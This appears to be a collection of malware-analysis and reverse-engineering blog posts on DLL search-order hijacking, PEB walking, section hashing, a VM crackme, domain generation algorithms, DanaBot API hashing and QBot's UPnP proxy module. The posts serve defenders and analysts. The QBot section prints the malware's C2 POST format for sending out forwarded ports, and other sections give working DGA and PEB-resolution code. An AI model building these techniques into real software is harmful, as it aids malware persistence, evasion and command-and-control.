Tools Update
The DLL Search Order And Hijacking It
If you ever used Process Monitor to track activity of a process, you might have encountered the following pattern:

The image above is a snippet from events captured by Process Monitor during the execution of x32dbg.exe
on Windows 7. DNSAPI.DLL
and IPHLPPAPI.DLL
are persisted in the System
directory, so you might question yourself:
Why would Windows try to search for either of these DLLs in the application directory first?
Operating Systems are very complex and so is the challenge of implementing an error-fault system to search for dependencies, like dynamic linked libraries. Today, weโll talk about DLL Search Order
and DLL Search Order Hijacking
, in particular how it works and how adversaries can abuse it.
DLL Search Order
First, we have to talk about what happens when a PE File is executed on the Windows system.
The majority of native binaries you encounter on Windows are linked dynamically. Linked dynamically means that upon start of the execution, it uses information which are embedded inside the binary to locate DLLs that are essential for this process. In comparison with statically linked binaries, when linked dynamically the executable will use the libraries provided by the OS instead of having them compiled into the executable itself.
Before the dynamically linked executable can use or load these libraries, it will have to know where these dependencies are persisted on disk or if they are already in memory. This is where the DLL Search Order
makes its appearance. To keep it simple, we will focus only on Windows Desktop Applications.
Pre-Checks and In-Memory Search
Before the Windows OS starts searching for the needed DLL on disk, it will first attempt to find the needed module in memory. If a DLL is already in memory, it will not loaded it again. Now this part is a little bit complicated and out of context for this blog article, we would have to define what โloadedโ even means. If you are more interested in the first check, I advise you to look up the official Microsoft documentation[1].
If the memory check fails, Windows can fall back to using a list of known DLLs. if the needed library is part of that list, it will use the copy of the known DLL. The list of known DLLs are persisted in the Windows Registry.

On-Disk Search
If the first two checks fail, the OS will have to search for the DLL on disk. Depending on the OS Settings, Windows will use a different search order. Per default, Windows enables the DLL Search Mode
feature to harden the system and prevent DLL Search Order Hijacking attacks, a technique we will explain in the upcoming section.
The key to the feature is as follows:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
Letโs take a look at the differences of the search order depending whether SafeDllSearchMode
is enabled or not.

We clearly see that the current directory is prioritised if SafeDllSearchMode
is disabled and this can be abused by adversaries. The art of abusing this search order flow is called DLL Search Order Hijacking
.
DLL Search Order Hijacking
Adversaries can abuse the search order flow displayed above to load their own malicious DLLs instead of the legitimate ones into memory. There are many ways this technique can be used. However, it is more effective in achieving persistence on the target system then initial execution.
Letโs take a step back and revisit our example from above:
x32dbg.exe
tries to loadDNSAPI.DLL
DNSAPI.DLL
is not in the list of known DLLs and is also not loaded into memory.- Since
SafeDllSearchMode
is enabled, it will fall back to the system directory if not found in the application directory
What would happen, if we craft and place a malicious DLL, named DNSAPI.DLL
into the application directory?
We would be able to hijack the search order flow and force a legitimate application to load our malicious code into memory.
Practical Use Case
Letโs take a look at a simple practical example. Our application calls LoadLibraryA
and tries to load dnsapi.dll
like in our example from above. Next we craft a small DLL file, which does nothing else but create a message box in the DLLMain
function. Once the DLL is loaded into memory, the main function will be triggered.
In the first run, we do not place the crafted DLL in the application directory. As expected, Windows will load dnsapi.dll
from the system
directory:

Next, we will now name our crafted DLL dnsapi.dll
and place it in the application directory:

Whoops! I think we can all think of a couple use cases of how APT groups and malware can abuse this technique to achieve persistence on the victimโs system.
Real world examples and APTs
For the sake of keeping it simple and explaining the core principles behind this persistence technique, weโve build a very simple use case here. Of course, the real world looks a little bit different and usually attackers have to take into account:
- Endpoint Security solutions with behaviour based detections, preventing such attacks with signatures
- Programmatic dependencies, which wonโt allow you to just replace a DLL in an application directory and hope that it will work just fine
- and many more
However, if you never heard about this technique, I hope I was able to create some awareness for it!
PEB: Where Magic Is Stored
As a reverse engineer, every now and then you encounter a situation where you dive deeper into the internal structures of an operating system as usual. Be it out of simple curiosity, or because you need to understand how a binary uses specific parts of the operating system in certain ways . One of the more interesting structures in Windows is the Process Environment Block/PEB. In this article, Iโd like to introduce you to this structure and talk about various use cases of how adversaries can abuse this structure for their own purposes.
Introducing PEB
The Process Environment Block is a critical structure in the Windows OS, most of its fields are not intended to be used by other than the operating system. It contains data structures that apply across a whole process and is stored in user-mode memory, which makes it accessible for the corresponding process. The structure contains valuable information about the running process, including:
- whether the process is being debugged or not
- which modules are loaded into memory
- the command line used to invoke the process
All these information gives adversaries a number of possibilities to abuse it. The figure below shows the layout of the PEB
structure:
typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[1]; PVOID Reserved3[2]; PPEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; PVOID Reserved4[3]; PVOID AtlThunkSListPtr; PVOID Reserved5; ULONG Reserved6; PVOID Reserved7; ULONG Reserved8; ULONG AtlThunkSListPtr32; PVOID Reserved9[45]; BYTE Reserved10[96]; PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; BYTE Reserved11[128]; PVOID Reserved12[1]; ULONG SessionId; } PEB, *PPEB;
Now that weโve talked a little bit about the layout and purpose of the structure, letโs take a look at a few use cases.
Reading the BeingDebugged flag
The most obvious way is to check the BeingDebugged
to identify, whether a debugger is attached to the process or not. Through reading the variable directly from memory instead of using usual suspects like NtQueryInformationProcess
or IsDebuggerPresent
, malware can prevent noisy WINAPI calls. This makes it harder to spot this technique.
However, most debuggers already take care of this. X64dbg
for example, has an option to hide the Debugger by modifying the PEB structure at start of the debugging session.
Iterating through loaded modules
Another use case, could be iterating the loaded modules and discover DLLs injected into memory with purpose to overwatch the running process. To understand how to achieve this, we need to take a look at the PPEB_LDR_DATA
structure included in PEB
, which is provided by the Ldr
variable:
typedef struct _PEB_LDR_DATA { BYTE Reserved1[8]; PVOID Reserved2[3]; LIST_ENTRY InMemoryOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA;
PPEB_LDR_DATA
contains the head to a doubly linked list named InMemoryOrderModuleList
. Each item in this list is a structure from type LDR_DATA_TABLE_ENTRY
, which contains all the information we need to iterate loaded modules. See the structure of LDR_DATA_TABLE_ENTRY
below:
typedef struct _LDR_DATA_TABLE_ENTRY { PVOID Reserved1[2]; LIST_ENTRY InMemoryOrderLinks; PVOID Reserved2[2]; PVOID DllBase; PVOID EntryPoint; PVOID Reserved3; UNICODE_STRING FullDllName; BYTE Reserved4[8]; PVOID Reserved5[3]; union { ULONG CheckSum; PVOID Reserved6; }; ULONG TimeDateStamp; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
So by iterating the doubly linked list, we are able to discover the base address and full name of all modules loaded into memory of the running process. The snippet below is a small Proof of Concept. It iterates the linked list and prints the library name to stdout. I created it for the purpose of this blog article. You are free to use it, however I will also upload it to my github repo the upcoming days:
#include <Windows.h> #include <iostream> #include <shlwapi.h> #define NO_STDIO_REDIRECT typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; typedef struct _LDR_DATA_TABLE_ENTRY_MOD { LIST_ENTRY InMemoryOrderLinks; PVOID Reserved2[2]; PVOID DllBase; PVOID EntryPoint; PVOID Reserved3; UNICODE_STRING FullDllName; BYTE Reserved4[8]; PVOID Reserved5[3]; union { ULONG CheckSum; PVOID Reserved6; }; ULONG TimeDateStamp; } LDR_DATA_TABLE_ENTRY_MOD, * PLDR_DATA_TABLE_ENTRY_MOD_MOD; int main(int argc, char** argv[]){ PLDR_DATA_TABLE_ENTRY_MOD_MOD lib = NULL; _asm { xor eax, eax mov eax, fs:[0x30] mov eax, [eax + 0xC] mov eax, [eax + 0x14] mov lib, eax }; printf("[+] Initialised pointer to first LDR_DATA_TABLE_ENTRY_MOD\n"); // Loop as long as we don't reach the head of the linked list again while ( lib->FullDllName.Buffer != NULL ) { printf("[+] %S\n", lib->FullDllName.Buffer); lib = (PLDR_DATA_TABLE_ENTRY_MOD_MOD)lib->InMemoryOrderLinks.Flink; } printf("[+] Done!\n"); return 0;
If you are wondering how I am able to access the PEB
in the code below, you should take a look at the inline assembly in the main
method, especially the instruction mov eax, fs:[0x30]
. FS is a segment register, similar to GS. FS can be used to access thread-specific memory. Offset 0x30
allows you to access the linear address of the Process Environment Block.
Finally, we want to take a look at a real world example of how PEB
can be abused.
How the MATA Framework abuses PEB
This use case was introduced to me while reverse engineering a Windows variant of the MATA Framework. According to Kaspersky[1], the MATA Framework is used by the Lazarus group and targets multiple platforms.
Malware authors have a high interest in obfuscation, because it increases the time needed to reverse engineer it. One way to hide API calls is to use API Hashing. I have written about Danabotโs API Hashing[2] before and how to overcome it. MATA also uses this technique.
However instead of using the WIN API calls to retrieve the address of DLLs loaded into memory, MATA abuses the Process Environment Block to fetch base addresses. Letโs take a look at how MATA for Windows achieves this:
MATA API Hashing
The input of the APIHashing
method takes an integer as the only parameter, this is the hash for the corresponding API call.

Right after the prologue, it retrieves a pointer to PEB
by reading it from the Thread Environment Block via the segment register GS
. Similar to our proof of concept above, MATA now fetches the address to the head of the linked list provided by InMemoryOrderModuleList
. Each item of the linked list provides the DLL base address of the corresponding loaded module.
From there, the malware reads the e_lfanew
field, which contains the offset to the file header. By adding the base address, e_lfsanew
and 0x88
it jumps directly to the data directories of the corresponding PE. From the data directories, MATA accesses the exported function names in a similar way as Iโve described in my blog article about DanaBotโs API Hashing[3]. The hashing algorithm is fairly simple. Each integer representation of a character is added and the result of the addition is ROR'd
by 0xD
consecutively each iteration. If the final hash matches the input parameter, the address to the function is retrieved. The following figure explains the function at a high level:

Learning from each other
Thatโs it with the blog article, I hope you enjoyed it! There are probably way more use cases and real world cases of how the PEB
is and and can be abused. If you can think of another one, feel free to leave a comment below and share it, so that we can learn from each other!
Catching Debuggers with Section Hashing
As a Reverse Engineer, you will always have to deal with various anti analysis measures. The amount of possibilities to hamper our work is endless. Not only you will have to deal with code obfuscation to hinder your static analysis, but also tricks to prevent you from debugging the software you want to dig deeper into. I want to present you Section Hashing
today.
I will begin by explaining how software breakpoints work internally and then give you an example of a Section Hashing
implementation.
Debuggers โ How software breakpoints work
When you set a breakpoint in your favourite debugger at a specific instruction, the debugger software will replace it temporarily with another instruction, which causes a fault or an interrupt. On x86, this is very often the INT 3
instruction, which is the opcode 0xCC
. We can examine how this looks like in RAM.
We open x32dbg.exe
and debug a 32 bit PE and set a breakpoint near the entry point.

When setting a breakpoint, you will see the original instruction instead of the patched one in the debugger. However, we can examine the same memory page in RAM with ProcessHacker.

In volatile memory, the byte 33
changed to CC
, which will cause the program to halt when reached. This software interrupt will then be handled by the debugger and the code will be replaced again.
Catching Breakpoints with Section Hashing
After explaining how software breakpoints work, Iโll get to the real topic of this article now. We will move to the Linux world now for this example.
A software breakpoint is actually nothing else than a code modification of the executable memory section in RAM. Once a breakpoint is set, the .text
section will be modified. A very known technique to catch such breakpoints in RAM is called Section Hashing
.
Authors can embed the hash of the .text section in the binary. Upon execution, they use the same algorithm to generate a new hash from the .text section. If a software breakpoint is set, the hash will differ from the embedded hash. An example implementation can look like this:

In this case, a hash of the .text section is generated. Afterwards it is used to influence the generation of the flag. If a software breakpoint is set during execution, a wrong hash will be generated.
This is a simple example of Section Hashing
. In combination with code obfuscation and other anti analysis measurements, it can be very hard to spot this technique. It is also occasionally used by commercial packers.
Defeating Section Hashing
There are multiple ways to defeat this technique, some of them could be:
- Patching instructions
- Using hardware breakpoints
Instead of modifying the code in Random Access Memory, in x86 hardware breakpoints use dedicated registers to halt the execution. Hardware Breakpoints are still detectable.
In Windows, the program can fetch the CONTEXT
via GetThreadContext
to see if the debugging registers are used. A great example on how this is implemented can be found here[1]. If you are interested in trying to defeat it by yourself, you can try to beat the Section Hashing
technique by yourself at root-me.org[2].
Taming Virtual Machine Based Code Protection โ 2
In the last episode โฆ
As youโve probably guessed it, this is the second part of my journey to reverse engineer a virtual machine protected binary. If you havenโt read the first part[1], I encourage you to do so, because I will not repeat everything again here. While the first part dealt with explaining the virtual environment and giving an initial first look into the virtual machineโs custom instruction set, I will focus on disassembling the virtual machine code completely this time.
I might repeat some steps from the first part again, mostly because I felt that it was necessary to do so :-).
Into the battle
We already explained the environmental setup in the previous blog post and also identified the main loop, which is responsible for instruction execution.

Each iteration, an instruction is parsed and the final CALL
in the left branch of figure 1 executes the instruction.
Critical functions
I covered the instruction parsing process in my last blog article a little bit. But since we are going to build a disassembler, I will explain the most important routines once again.
0x4013DF / ParseInstruction
This function is called each iteration in the loop from figure 1 and is responsible for parsing the byte codes.

Each loop, the Virtual Instruction Pointer/VIP
is retrieved, pointing at the instruction to execute. Each instruction is parsed. This function is fully responsible for transforming the bytes into a further processable format. Letโs take a look at how the first three instructions are parsed:

If you are interested in understanding this format fully, I recommend you to jump to the disassembler code[2]. I will only cover the first instruction here.
So how do we get from 03 15 03 00 04
to the parsed format ?
The first byte is always the instruction id. 03
is the id for the PUSH
instruction. The second byte is divided into its upper 6 bits and lower 2 bits, representing the instruction size and number of operands used for this instruction. The next bytes are used to represent a single operand. In the example above, the first operand config 00 03 00 00, is the configuration for USE 32 BIT OF REGISTER, SPECIFIED BY THE NEXT DWORD 04 00 00 00
. The next DWORD is 04 00 00 00
, which is the fourth virtual register. Now what is the fourth register here ? Letโs take a quick look at the instructions.
PUSH VR4 MOV VR4, VR7 SUB VR7, 0xB4
This looks very similar to the usual function prologue ;-). So the fourth register must be EBP
!.
PUSH EBP MOV EBP, ESP SUB ESP, 0xB4
0x401271 / GetOpval & 0x401322 / StoreOpval
I will not cover these two functions in depth here. If you take a look at figure 3 again, you will see that I mention the operand configs
. These functions are responsible for filling the operands according to these configs.
In the example above, the SUB VR7, 0xB4
instruction uses 00030000 07000000
for the first operand and 00020000 B4000000
for the second config. If you reverse engineer every single option, you will find out that the following configurations exist:
# First DWORD CONFIG 00000000 ==> LOWEST BYTE OF REG X # f.e AX 00010000 ==> SECOND LOWEST BYTE OF REG X # f.e. AH 00020000 ==> LOWER 16 BIT OF REG X # f.e. AX 00030000 ==> 32 BIT OF REGX # f.e. EAX 01000000 ==> BYTE AT LOC 01010000 ==> BYTE AT LOC 01020000 ==> WORD AT LOC 01030000 ==> DWORD AT LOC 02000000 == BYTE FROM IMM. 02010000 ==> BYTE FROM IMM. 02020000 ==> WORD FROM IMM. 02030000 ==> DWORD FROM IMM. # Second DWORD CONFIG, if register 00000000 ==> EAX 01000000 ==> EBX 02000000 ==> ECX 03000000 ==> EDX 04000000 ==> EBP 05000000 ==> ESI 06000000 ==> EDI 07000000 ==> ESP
Eternal Debugging
Now we can use the gained knowledge to gain an initial understanding of what is happening and to verify whether we are able to decode instructions manually.

If you take a look at the last instructions, you will see that there are some constants pushed into memory. If you google these constants, you will come to the conclusion that this must be the MD5 Init
routine[3]. The next step is to build a disassembler.
Disassembling the code
I wrote this one in C++ and you can find the source code to it on my github page[4]. Writing this on Python would have been possible too โฆ and probably a lot easier and faster, I chose C++ though for learning purposes. If my C++ is awful, forgive me. We all start somewhere ;-).

Our disassembler does have some limitations though. The disassembly was complex and I believe that some memory address offsets and register sizes are wrong. Also, I did not reverse engineer all instructions. However though, that should not be a problem, because we only need to understand what is happening here on a higher level.
Identifying the algorithm
We already spotted the variables, which we also found in the MD5.c source code(f.e. 0x2381bc0
). However, the actual hashing algorithm does not match the original one. Therefore it seems to be some kind of a modified version of it. Furthermore we spot a routine, which seems to be the XTEA algorithm[5].

Final words
So thatโs basically it. I donโt know when and if I will a third part covering the serial key generator. When I started this challenge, I was only interested in learning how to disassemble custom instruction sets.
If you are interested in how others solved this challenge, I recommend you to read the tutorials from wagonono and kernelj, they both completely solved this challenge[6]. Wagonono also created a disassembler and his version is better than mine.
DGAs โ Generating domains dynamically
A domain generation algorithm is a routine/program that generates a domain dynamically. Think of the following example:
An actor registers the domain evil.com
. The corresponding backdoor has this domain hardcoded into its code. Once the attacker infects a target with this malware, it will start contacting its C2 server.
As soon as a security company obtains the malware, it might blacklist the registered domain evil.com
. This will hinder any attempts of the malware to receive commands from the original C2.
If a domain generation algorithm would have been used, the domain will be generated based on a seed. The current date for example is a popular seed amongst malware authors. A simple domain blacklisting would not solve the problem. The security company will have to resort to different methods.
By generating domains dynamically, it is harder for defenders to hinder the malware from contacting its C2 server. It will be necessary to understand the algorithm.
Example implementation of a DGA
A quick & dirty implementation(loosely based on Wikipedia)[1] of such algorithm could look like this:
"""Example implementation of a domain generation algorithm.""" import sys import time import random def gen_domain(month, day, hour, minute): """Generate the domain based on time. Return domain""" print( f"[+] Gen domain based on month={month} day={day} hour={hour} min={minute}") domain = "" for i in range(8): month = (((month * 8) ^ 0xF)) day = (((day * 8) ^ 0xF)) hour = (((hour * 8) ^ 0xF)) minute = (((minute * 8) ^ 0xF)) domain += chr(((month * day * hour * minute) % 25) + 0x61) return domain try: while True: d = gen_domain(random.randint(1, 12), random.randint(1, 30), random.randint(0, 24), random.randint(0, 60)) print(f"[+] Generated domain = {d}") time.sleep(5) except KeyboardInterrupt: sys.exit()
Our DGA algorithm would use the current date and time as a seed. Each parameter is multiplied with 8 and XORโd with 0xF
. Finally all four values are multiplied with each other. The final operations are used to make sure that we generate a character in small caps. The output of this program looks like this:
[+] Gen domain based on month=12 day=2 hour=4 min=4 [+] Generated domain = taavtaab.com [+] Gen domain based on month=3 day=10 hour=11 min=36 [+] Generated domain = kugxfkvx.com [+] Gen domain based on month=2 day=27 hour=4 min=1 [+] Generated domain = kaasuapn.com
Seed or Dictionary based
There are different main approaches when implementing a domain generation algorithm. For the sake of keeping this simple, we will not focus on the hybrid approach.

Seed based Approach
We already introduced the first one. Our implementation is an algorithm based on a seed, which is served as an input. Another example I can provide, is how APT34
used such seed based algorithm in a campaign targeting a government organisation in the Middle East. The campaign was discovered by FireEye[2].
The mentioned APT group used domain generation algorithms in one of their downloaders. The Downloader was named BONDUPDATER
by FireEye and is implemented in the Powershell Scripting Language.

The first 12 chars of the UUID is extracted. Next the program runs into a loop. Each iteration a new random number is generated and the domain is generated by concatenating hardcoded, as well as generated values. GetHostAddresses
will try to resolve the generated domain. If it fails, a new iteration starts. Once a registered domain is generated and resolved, it will break the loop.
Depending on the resolved ip address, the script will trigger different actions.
Dictionary based Approach
The second approach is to create a dictionary based domain generation algorithm. Instead of focusing on a seed, a list of words could be provided. The algorithm randomly selects words from these lists, concatenates them and generates a new domain. Suppobox[3] is a malware, which implemented the dictionary based approach[4].
Defeating Domain Generation Algorithms
The straight forward way to counter these algorithms is to reverse engineer the routine and to predict future domains. One famous case of predicting future domains is the takedown of the Necurs Botnet by Microsoft[5]. By understanding the DGA, they were able to predict the domains for the next 25 months.
I am not a ML magician. However, just a quick google research shows that there is a lot research going on. Machine Learning based approaches to counter DGAs seems to be promising too.
Linux/Windows Internals โ Process structures
Having an overview of the running processes on the operating system is something we usually take for granted. We canโt think of working without fundamental features like that.
But how does the kernel keep track of the processes, which are currently running ? Today, we take a look at the corresponding structures of the Windows and the Linux system, which are responsible for holding track of the running processes.
Linux โ Task structures
If you ever used Linux before, you are probably familiar with the ps
command, which allows you to print the list of all processes currently running on the system. We will dive into how the Linux kernel keeps track of these processes internally.
The kernel stores a list of processes in a doubly linked list, called the task list
. Each node in this list is a process descriptor of the type task_struct
. The definition of this task struct
can be found in linux/sched.h
[1] of Linus Torvaldโs git repository.

If you checked out the code, you will realise that this structure is pretty extensive and we will not dive into every member of this structure. Our focus lies on understanding how the kernel handles this task list. As Iโve already explained, the kernel keeps track of all processes by a doubly linked list. Each task structure holds a member tasks
of type list_head
.
struct list_head { struct list_head *next, *prev; };
As youโve probably already guessed, the next
pointer holds a reference, which allows us to retrieve the next task_struct
and the prev
field allows us to take a step back. We can write a simple to linux kernel module to iterate through the task list and print out all process names and process ids on the current system:
Iterating through the linked list
Task structures lie in kernel space, so accessing these is not possible without writing a kernel module. The code is pretty straight forward. We just use the init_task
as an initial entry point, which is the idle task running on the linux system. Iterating through the linked list is possible via the next_task
macro. Then we use the printk
function to log the comm
(process executable) member and the process id.
#include <linux/sched/task.h> #include <linux/sched/signal.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("Andreas Klopsch"); MODULE_DESCRIPTION("Simple module for printing task structure members"); MODULE_VERSION("0.1"); // get the top element in the task doubly linked list extern struct task_struct init_task; static int __init action_init(void){ struct task_struct task; printk(KERN_INFO "Init task = %s", init_task.comm); printk(KERN_INFO "Getting next task"); task = *(next_task(&init_task)); // deference pointer for convencience reasons while(task.pid != init_task.pid) { printk(KERN_INFO "Comm = %s pid = %d", task.comm, task.pid); task = *(next_task(&task)); // dereference again, use macro to not iterate through list_head } return 0; } static void __exit action_exit(void){ printk(KERN_INFO "Stopping task iterator"); } module_init(action_init); module_exit(action_exit);

Windows โ EPROCESS
On Windows, there are similarities with Linux. Each process on Windows is represented by an EPROCESS
structure, which is actually the representation of a process object. The EPROCESS
structure also contains a KPROCESS
structure, which holds information for the kernel.
As with Linux, this block contains various information relating to the corresponding process, like:
- Virtual Address Descriptors, holding the map of the process virtual memory
- Process ID
- Image base name
Another similarity with the Linux system, is the way the processes are linked with each other. EPROCESS
structures are connected to each other via a doubly linked list, called ActiveProcessLinks
. The next process in the list is referenced by FLink
and the previous process object is referenced by the BLink
pointer. One way of how this could be implemented, is iterating through the ActiveProcessLinks
structure again.

References
- Windows Internals, Part 1: System Architecture, Processes, Threads, Memory Management, and More
- Mastering Malware Analysis: The complete malware analystโs guide to combating malicious software, APT, cybercrime, and IoT attacksย
Deobfuscating DanaBotโs API Hashing
You probably already guessed it from the titleโs name, API Hashing is used to obfuscate a binary in order to hide API names from static analysis tools, hindering a reverse engineer to understand the malwareโs functionality.
A first approach to get an idea of an executableโs functionalities is to more or less dive through the functions and look out for API calls. If, for example a CreateFileW
function is called in a specific subroutine, it probably means that cross references or the routine itself implement some file handling functionalities. This wonโt be possible if API Hashing is used.
Instead of calling the function directly, each API call has a corresponding checksum/hash. A hardcoded hash value might be retrieved and for each library function a checksum is computed. If the computed value matches the hash value we compare it against, we found our target.

In this case a reverse engineer needs to choose a different path to analyse the binary or deobfuscate it. This blog article will cover how the DanaBot banking trojan implements API Hashing and possibly the easiest way on how this can be defeated. The SHA256
of the binary I am dissecting here is added at the end of this blog post.
Deep diving into DanaBot
DanaBot itself is a banking trojan and has been around since atleast 2018 and was first discovered by ESET[1]. It is worth mentioning that it implements most of its functionalities in plugins, which are downloaded from the C2 server. I will focus on deobfuscating API Hashing in the first stage of DanaBot, a DLL which is dropped and persisted on the system, used to download further plugins.
Reversing the ResolvFuncHash routine
At the beginning of the function, the EAX
register stores a pointer to the DOS
header of the Dynamic Linked Library which, contains the function the binary wants to call. The corresponding hash of the yet unknown API function is stored in the EDX
register. The routine also contains a pile of junk instructions, obfuscating the actual use case for this function.
The hash is computed solely from the function name, so the first step is to get a pointer to all function names of the target library. Each DLL contains a table with all exported functions, which are loaded into memory. This Export Directory is always the first entry in the Data Directory array. The PE file format and its headers contain enough information to reach this mentioned directory by parsing header structures:

In the picture below, you can see an example of the mentioned junk instructions, as well as the critical block, which compares the computed hash with the checksum of the function we want to call. The routine iterates through all function names in the Export Directory and calculates the hash.
The loop breaks once the computed hash matches the value that is stored in the EDX
register since the beginning of this routine.

Reversing the hashing algorithm
The hashing algorithm is fairly simple and nothing too complicated. Junk instructions and opaque predicates complicate the process of reversing this routine.
The algorithm takes the nth
and the stringLength-n-1th
char of the function name and stores them, as well as capitalised versions into memory, resulting in a total of 4 characters. Each one of those characters is XOR'd
with the string length. Finally they are multiplied and the values โโare added up each time the loop is run and result in the hash value.
def get_hash(funcname): """Calculate the hash value for function name. Return hash value as integer""" strlen = len(funcname) # if the length is even, we encounter a different behaviour i = 0 hashv = 0x0 while i < strlen: if i == (strlen - 1): ch1 = funcname[0] else: ch1 = funcname[strlen - 2 - i] # init first character and capitalize it ch = funcname[i] uc_ch = ch.capitalize() # Capitalize the second character uc_ch1 = ch1.capitalize() # Calculate all XOR values xor_ch = ord(ch) ^ strlen xor_uc_ch = ord(uc_ch) ^ strlen xor_ch1 = ord(ch1) ^ strlen xor_uc_ch1 = ord(uc_ch1) ^ strlen # do the multiplication and XOR again with upper case character1 hashv += ((xor_ch * xor_ch1) * xor_uc_ch) hashv = hashv ^ xor_uc_ch1 i += 1 return hashv
A python script for calculating the hash for a given function name is also uploaded on my github page[2] and free for everyone to use. Iโve also uploaded a text file with hashes for exported functions of commonly used DLLs.
Deobfuscation by Commenting
So now that we cracked the algorithm, we want to update our disassembly to know which hash value represents which function. As Iโve already mentioned, we want to focus on simplicity. The easiest way is to compute hash values for exported functions of commonly used DLLs and write them into a file.

With this file, we can write an IdaPython
script to comment the library function name next to the Api Hashing call. Luckily the Api Hashing function is always called with the same pattern:
- Move the wanted hash value into the
EDX
register - Move a
DWORD
intoEAX
register
First we retrieve all XRefs
of the Api Hashing function. Each XRef
will contain an address where the Api Hashing function is called at, which means that in atleast the 5 previous instructions, we will find the mentioned pattern. So we will fetch the previous instruction until we extract the wanted hash value, which is being pushed into EDX
. Finally we can use this immediate to extract the corresponding api function from the hash values we have generated before and comment the function name next to the Xref
address.
def add_comment(addr, hashv, api_table): """Write a comment at addr with the matching api function.Return True if a corresponding api hash was found.""" # remove the "h" at the end of the string hashv = hex(int(hashv[:-1], 16)) keys = api_table.keys() if hashv in keys: apifunc = api_table[hashv] print "Found ApiFunction = %s. Adding comment." % (apifunc,) idc.MakeComm(addr, apifunc) comment_added = True else: print "Api function for hash = %s not found" % (hashv,) comment_added = False return comment_added def main(): """Main""" f = open( "C:\\Users\\luffy\\Desktop\\Danabot\\05-07-2020\\Utils\\danabot_hash_table.txt", "r") lines = f.readlines() f.close() api_table = get_api_table(lines) i = 0 ii = 0 for xref in idautils.XrefsTo(0x2f2858): i += 1 currentaddr = xref.frm addr_minus = currentaddr - 0x10 while currentaddr >= addr_minus: currentaddr = PrevHead(currentaddr) is_mov = GetMnem(currentaddr) == "mov" if is_mov: dst_is_edx = GetOpnd(currentaddr, 0) == "edx" # needs to be edx register to match pattern if dst_is_edx: src = GetOpnd(currentaddr, 1) # immediate always ends with 'h' in IDA if src.endswith("h"): add_comment(xref.frm, src, api_table) ii += 1 print "Total xrefs found %d" % (i,) print "Total api hash functions deobfuscated %d" % (ii,) if __name__ == '__main__': main()
Conclusion
As reverse engineers, we will probably continue to encounter Api Hashing in various different ways. I hope I was able to show you some quick & dirty method or give you at least some fundament on how to beat this obfuscation technique. I also hope that, the next time a blue team fellow has to analyse DanaBot, this article might become handy to him and saves him some time reverse engineering this banking trojan.
IoCs
- Dropper =
e444e98ee06dc0e26cae8aa57a0cddab7b050db22d3002bd2b0da47d4fd5d78c
- DLL =
cde01a2eeb558545c57d5c71c75e9a3b70d71ea6bbeda790a0b871fcb1b76f49
UpnP โ Messing up Security since years
UpnP is a set of networking protocols to permit network devices to discover each otherโs presence on a network and establish services for various functionalities.
Too lazy to port forward yourself ? Just enable UpnP to automatically establish working configurations with devices! Dynamic device configuration like this makes our life more comfortable for sure. Sadly it also comes with many security issues.
In this blog article I am focusing on mentioning the stages of the UpnP protocol, a quick introduction to security issues regarding UpnP and how QBot abuses the UpnP protocol to exploit devices as proxy C2 servers.
UpnP in a nutshell
UpnP takes usage of common networking protocols and stacks HTTP
, SOAP
and XML
on top of the IP
protocol in order to provide a variety of functionalities for users. Without going to deep into how UpnP works in detail, the following figure is enough for the basics.

Some services a node with UpnP enabled can offer (it really depends on the device):
- Port forwarding
- Switching power on and off for light bulbs
- etc.
This is very high level of course. If you are interested in everything about UpnP, I recommend you to check out Wikipedia[1] for a high level introduction or read this report that goes more into detail[2].
For the following content of this blog article, only the first three stages are really relevant.
IoT Security and UpnP
Misconfiguration
Again, while it might be very convenient for customers to have devices autoconfigure themselves, it leads to huge security risks.
Many routers have UpnP enabled by default. Think of misconfigured IoT devices that sends a command to port forward a specific port, leading to a port exposure to the internet.
It is known that many IoT devices contain awful security flaws like default credentials for telnet. If devices like this have such misconfigurations and expose its telnet port to the outside, it probably takes about 5 minutes till some script kiddie adds this device to its botnet.
Exploitation
A blog post from TrendMicro[3] previously mentioned that many devices still use very old UpnP libraries which are not up to date to current security standards. This creates a larger attack surface for attackers. The newest one being CallStranger
.

It is caused by the Callback header value in the UpnP SUBSCRIBE function. This field can be controlled by an attacker and enabled a Server Side Request Forgery
like vulnerability. It can be used for the following malicious cases:
- Exfilitrate data
- Scan networks
- Force nodes to participate in DDoS attacks
I recommend you to visit the official domain[4] of this vulnerability, if you want gain more knowledge about this vulnerability.
UpnP abused by QBot
Security risks created by UpnP are not limited to the IoT landscape of course.
Another method to use UpnP for malicious cases is to install Proxy C2 servers on devices which have the mentioned protocol enabled, like QBot does for example. Letโs take a look at how this is done.
Diving into QBotโs UpnP proxy module
This technique was first discovered by McAfee[4] in 2017. First QBot starts scanning for devices which have UpnP enabled and is one of the following device types:
- urn:schemas-upnp-org:device:InternetGatewayDevice:1
- urn:schemas-upnp-org:service:WANIPConnection:1
- urn:schemas-upnp-org:service:WANPPPConnection:1
- upnp:rootdevice

If you are using INETSIM for malware analysis, you will probably realise that it does not offer any functionality to fake a SSDP or UpnP service in any way. However, we can use this python script[5] by user GrahamCobb which emulates a fake SSDP service and adjust the device description to suit our needs.
Once the devices are discovered, it sends requests for device descriptions and checks whether it deals with an internet gateway device. This can be determined by looking at the device description itself.

If it is an internet gateway device, it confirms whether a connection exists by sending a GetStatusInfo
followed by retrieving the external ip address of this device by sending the GetExternalIPAddress
command.
Next it tries to use the AddPortMapping
command to add port forwarding rules to the device.

Afterwards all rules are removed again and the ports which were successfully port forwarded are sent as a HTTP-POST
to the C2 server.
The carrier protocol is HTTPS
and the response is sent in the following form:
# destination address
https://[HARDCODED_IP]:[HARDCODED_PORT]/bot_serv
# POST DATA form, successful port forwarded ports are appended to ports
cmd=1&msg=%s&ports=
